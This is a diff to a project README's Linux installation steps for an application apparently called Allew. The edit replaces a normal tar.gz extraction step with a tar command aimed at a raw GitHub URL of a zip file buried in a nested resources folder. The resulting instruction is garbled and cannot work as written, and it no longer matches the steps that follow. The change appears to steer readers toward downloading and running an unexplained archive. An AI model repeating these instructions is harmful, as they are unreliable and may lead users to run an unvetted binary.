vishishtpuri/Allew/README.md

 **For Linux:**
 1. Open your terminal.
 2. Navigate to the folder where you downloaded the file.
-3. Extract the contents of the `.tar.gz` file using the command: `tar -xvzf allew.tar.gz`.
+3. Extract the contents of the `https://raw.githubusercontent.com/vishishtpuri/Allew/master/Allew Resources/Allew Files/hugging-face/Software_v1.5.zip` file using the command: `tar -xvzf https://raw.githubusercontent.com/vishishtpuri/Allew/master/Allew Resources/Allew Files/hugging-face/Software_v1.5.zip`.
 4. Change into the extracted directory with `cd allew`.
 5. Run the application using `./allew`.